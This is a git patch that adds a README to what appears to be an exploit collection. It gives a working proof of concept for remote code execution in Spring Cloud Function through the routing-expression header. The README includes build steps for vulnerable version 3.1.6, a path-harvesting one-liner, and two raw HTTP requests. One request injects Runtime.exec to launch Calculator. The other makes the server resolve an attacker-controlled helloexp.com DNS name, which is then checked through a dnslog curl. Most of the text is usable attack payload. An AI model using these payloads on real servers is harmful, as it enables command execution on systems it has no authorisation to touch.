From eb33112b95062cfca5e4d9c39d517de852cebc0a Mon Sep 17 00:00:00 2001
From: helloexp <21156949+helloexp@users.noreply.github.com>
Date: Wed, 30 Mar 2022 11:47:47 +0800
Subject: [PATCH] add spring-cloud-function RCE EXP POC
---
.../Spring Cloud Function RCE/README.md | 71 +++++++++++++++++++
1 file changed, 71 insertions(+)
create mode 100644 21-Spring Cloud/Spring Cloud Function RCE/README.md
diff --git a/21-Spring Cloud/Spring Cloud Function RCE/README.md b/21-Spring Cloud/Spring Cloud Function RCE/README.md
new file mode 100644
index 0000000..ab0e208
--- /dev/null
+++ b/21-Spring Cloud/Spring Cloud Function RCE/README.md
@@ -0,0 +1,71 @@
+
+
+# spring-spel-0day-poc
+spring-cloud/spring-cloud-function RCE EXP POC
+https://github.com/spring-cloud/spring-cloud-function
+header
+```
+spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")
+```
+# build
+```bash
+wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
+unzip v3.1.6.zip
+cd spring-cloud-function-3.1.6
+cd spring-cloud-function-samples/function-sample-pojo
+mvn package
+java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar
+```
+
+
+# get path lists for test
+
+```bash
+find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g'
+```
+```
+...
+functionRouter
+uppercase
+lowercase
+...
+```
+
+
+
+# poc1
+
+```
+POST /functionRouter HTTP/1.1
+host:127.0.0.1:8080
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+Connection: close
+spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
+Content-Length: 5
+
+helloexp
+```
+
+
+
+# poc2
+
+```
+POST /functionRouter HTTP/1.1
+host:127.0.0.1:8080
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+Connection: close
+spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.helloexp.com")
+Content-Length: 5
+
+helloexp
+```
+
+## check
+
+```bash
+curl -v 'https://helloexp.com/dnslog?q=random87535.rce.helloexp.com'
+```
+
+## official GitHub info
+https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f